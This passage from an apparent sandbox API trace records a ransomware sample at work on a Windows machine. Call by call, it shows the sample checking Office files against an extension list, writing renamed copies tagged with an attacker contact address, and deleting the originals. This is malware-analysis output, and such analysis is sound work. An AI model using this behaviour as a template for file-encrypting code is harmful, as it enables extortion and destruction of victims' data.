lpNewFilePointer=0xffffffff) returned 1 [0036.592] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x2defc2c | out: lpNewFilePointer=0x0) returned 1 [0036.592] ReadFile (in: hFile=0x1c8, lpBuffer=0x38e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2defc38, lpOverlapped=0x0 | out: lpBuffer=0x38e0058*, lpNumberOfBytesRead=0x2defc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.715] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0036.715] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2defcb0, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0036.840] SetEndOfFile (hFile=0x1c8) returned 1 [0036.840] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0036.844] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defc7c | out: lpNewFilePointer=0x0) returned 1 [0036.844] WriteFile (in: hFile=0x1c8, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2defc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x2defc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.846] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x2defc7c | out: lpNewFilePointer=0x0) returned 1 [0036.846] WriteFile (in: hFile=0x1c8, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2defc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x2defc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.197] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x2defc7c | out: lpNewFilePointer=0x0) returned 1 [0037.197] WriteFile (in: hFile=0x1c8, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2defc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x2defc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.199] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0037.202] CloseHandle (hObject=0x1c8) returned 1 [0037.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.555] lstrlenW (lpString=".doc") returned 4 [0037.555] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.555] lstrlenW (lpString=".docx") returned 5 [0037.555] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0037.555] lstrlenW (lpString=".pdf") returned 4 [0037.555] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.555] lstrlenW (lpString=".xls") returned 4 [0037.555] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.555] lstrlenW (lpString=".xlsx") returned 5 [0037.555] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0037.555] lstrlenW (lpString=".ppt") returned 4 [0037.555] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.555] lstrlenW (lpString=".zip") returned 4 [0037.555] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.555] lstrlenW (lpString=".rar") returned 4 [0037.555] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.555] lstrlenW (lpString=".bz2") returned 4 [0037.555] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.555] lstrlenW (lpString=".7z") returned 3 [0037.555] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.556] lstrlenW (lpString=".dbf") returned 4 [0037.556] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.556] lstrlenW (lpString=".1cd") returned 4 [0037.556] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.556] lstrlenW (lpString=".jpg") returned 4 [0037.556] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.556] lstrlenW (lpString=".doc") returned 4 [0037.556] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString=".docx") returned 5 [0037.556] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0037.556] lstrlenW (lpString=".pdf") returned 4 [0037.556] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString=".xls") returned 4 [0037.556] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString=".xlsx") returned 5 [0037.556] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0037.556] lstrlenW (lpString=".ppt") returned 4 [0037.556] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.556] lstrlenW (lpString=".zip") returned 4 [0037.556] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString=".rar") returned 4 [0037.556] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.556] lstrlenW (lpString=".bz2") returned 4 [0037.556] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.556] lstrlenW (lpString=".7z") returned 3 [0037.556] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.557] lstrlenW (lpString=".dbf") returned 4 [0037.557] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.557] lstrlenW (lpString=".1cd") returned 4 [0037.557] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0037.557] lstrlenW (lpString=".jpg") returned 4 [0037.557] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.557] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.557] lstrlenW (lpString="SETUP.XML") returned 9 [0037.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.782] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=9352) returned 1 [0040.782] CloseHandle (hObject=0x19c) returned 1 [0040.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 0x20 [0040.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.782] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.782] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0040.783] GetLastError () returned 0x0 [0040.783] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2488, lpOverlapped=0x0) returned 1 [0040.787] WriteFile (in: hFile=0x174, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2490, lpOverlapped=0x0) returned 1 [0040.788] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0040.788] WriteFile (in: hFile=0x174, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.788] SetEndOfFile (hFile=0x174) returned 1 [0040.788] CloseHandle (hObject=0x174) returned 1 [0040.789] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.789] SetEndOfFile (hFile=0x19c) returned 1 [0040.790] CloseHandle (hObject=0x19c) returned 1 [0040.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.790] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1 [0040.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.791] lstrlenW (lpString=".doc") returned 4 [0040.791] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString=".docx") returned 5 [0040.791] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.791] lstrlenW (lpString=".pdf") returned 4 [0040.791] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString=".xls") returned 4 [0040.791] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString=".xlsx") returned 5 [0040.791] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.791] lstrlenW (lpString=".ppt") returned 4 [0040.791] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.791] lstrlenW (lpString=".zip") returned 4 [0040.791] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.791] lstrlenW (lpString=".rar") returned 4 [0040.791] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString=".bz2") returned 4 [0040.791] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString=".7z") returned 3 [0040.791] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.791] lstrlenW (lpString=".dbf") returned 4 [0040.791] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.791] lstrlenW (lpString=".1cd") returned 4 [0040.791] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.791] lstrlenW (lpString=".jpg") returned 4 [0040.791] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.792] lstrlenW (lpString=".doc") returned 4 [0040.792] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString=".docx") returned 5 [0040.792] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.792] lstrlenW (lpString=".pdf") returned 4 [0040.792] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString=".xls") returned 4 [0040.792] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString=".xlsx") returned 5 [0040.792] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.792] lstrlenW (lpString=".ppt") returned 4 [0040.792] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.792] lstrlenW (lpString=".zip") returned 4 [0040.792] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.792] lstrlenW (lpString=".rar") returned 4 [0040.792] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString=".bz2") returned 4 [0040.792] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString=".7z") returned 3 [0040.792] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.792] lstrlenW (lpString=".dbf") returned 4 [0040.792] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.792] lstrlenW (lpString=".1cd") returned 4 [0040.792] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.792] lstrlenW (lpString=".jpg") returned 4 [0040.792] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.793] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.793] lstrlenW (lpString="PrjProrWW.XML") returned 13 [0040.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.794] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=6421) returned 1 [0040.794] CloseHandle (hObject=0x19c) returned 1 [0040.794] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 0x20 [0040.794] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.794] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.794] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0040.795] GetLastError () returned 0x0 [0040.795] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1915, lpOverlapped=0x0) returned 1 [0040.796] WriteFile (in: hFile=0x174, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1920, lpOverlapped=0x0) returned 1 [0040.797] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0040.797] WriteFile (in: hFile=0x174, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.797] SetEndOfFile (hFile=0x174) returned 1 [0040.797] CloseHandle (hObject=0x174) returned 1 [0040.798] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.798] SetEndOfFile (hFile=0x19c) returned 1 [0040.799] CloseHandle (hObject=0x19c) returned 1 [0040.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.799] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1 [0040.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.799] lstrlenW (lpString=".doc") returned 4 [0040.799] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.799] lstrlenW (lpString=".docx") returned 5 [0040.799] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.799] lstrlenW (lpString=".pdf") returned 4 [0040.799] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.799] lstrlenW (lpString=".xls") returned 4 [0040.799] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.799] lstrlenW (lpString=".xlsx") returned 5 [0040.799] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.800] lstrlenW (lpString=".ppt") returned 4 [0040.800] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.800] lstrlenW (lpString=".zip") returned 4 [0040.800] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.800] lstrlenW (lpString=".rar") returned 4 [0040.800] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString=".bz2") returned 4 [0040.800] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString=".7z") returned 3 [0040.800] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.800] lstrlenW (lpString=".dbf") returned 4 [0040.800] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.800] lstrlenW (lpString=".1cd") returned 4 [0040.800] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.800] lstrlenW (lpString=".jpg") returned 4 [0040.800] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.800] lstrlenW (lpString=".doc") returned 4 [0040.800] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString=".docx") returned 5 [0040.800] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.800] lstrlenW (lpString=".pdf") returned 4 [0040.800] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString=".xls") returned 4 [0040.800] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString=".xlsx") returned 5 [0040.800] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.800] lstrlenW (lpString=".ppt") returned 4 [0040.800] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.801] lstrlenW (lpString=".zip") returned 4 [0040.801] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.801] lstrlenW (lpString=".rar") returned 4 [0040.801] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.801] lstrlenW (lpString=".bz2") returned 4 [0040.801] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.801] lstrlenW (lpString=".7z") returned 3 [0040.801] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.801] lstrlenW (lpString=".dbf") returned 4 [0040.801] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.801] lstrlenW (lpString=".1cd") returned 4 [0040.801] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.801] lstrlenW (lpString=".jpg") returned 4 [0040.801] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.801] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.801] lstrlenW (lpString="SETUP.XML") returned 9 [0040.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.802] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=16683) returned 1 [0040.802] CloseHandle (hObject=0x19c) returned 1 [0040.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common 